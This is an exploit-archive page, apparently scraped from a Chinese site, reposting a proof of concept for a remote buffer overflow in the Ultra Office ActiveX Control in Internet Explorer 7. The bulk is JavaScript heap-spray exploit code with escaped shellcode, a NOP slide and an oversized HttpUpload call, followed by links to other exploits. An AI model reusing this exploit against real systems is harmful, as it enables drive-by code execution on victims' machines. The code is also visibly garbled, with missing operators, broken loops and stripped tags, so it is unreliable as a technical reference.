Ultra Office ActiveX Control Remote Buffer Overflow Exploit

摘要：----------------------------------------------------------------------...

-----------------------------------------------------------------------------

Ultra Office ActiveX Control Remote Buffer Overflow

url: http://www.ultrashareware.com Author: shinnai

mail: shinnai[at]autistici[dot]org

site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.

Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7

-----------------------------------------------------------------------------

var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"

"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A"

"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350"

"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40"

"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000"

"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040"

"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD"

"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40"

"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18"

"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0"

"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B"

"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24"

"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9"

"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C"

"%u652E%u6578%u9000");

var sSlide = unescape("%u9090%u9090");

var heapSA = 0x0c0c0c0c;

function tryMe()

{

var buffSize = 20000;

var x = unescape("");

while (x.length<buffSize) x = x;

x = x.substring(0,buffSize);

boom.HttpUpload(x, x, x);

}

function getsSlide(sSlide, sSlideSize)

{

while (sSlide.length*2<sSlideSize)

{

sSlide = sSlide;

}

sSlide = sSlide.substring(0,sSlideSize/2);

return (sSlide);

}

var heapBS = 0x400000;

var sizeHDM = 0x5;

var PLSize = (sCode.length * 2);

var sSlideSize = heapBS - (PLSize sizeHDM);

var heapBlocks = (heapSA heapBS)/heapBS;

var memory = new Array();

sSlide = getsSlide(sSlide,sSlideSize);

for (i=0;i<heapBlocks;i )

{

memory[i] = sSlide sCode;

}

</script>

Unable to create object

</object>

【Ultra Office ActiveX Control Remote Buffer Overflow Exploit】相关文章：

★ Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

★ NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

★ Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit

★ ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

★ Joomla Component EZ Store Remote Blind SQL Injection Exploit

★ LoveCMS 1.6.2 Final Remote Code Execution Exploit

上一篇： IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

下一篇： VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

学习工具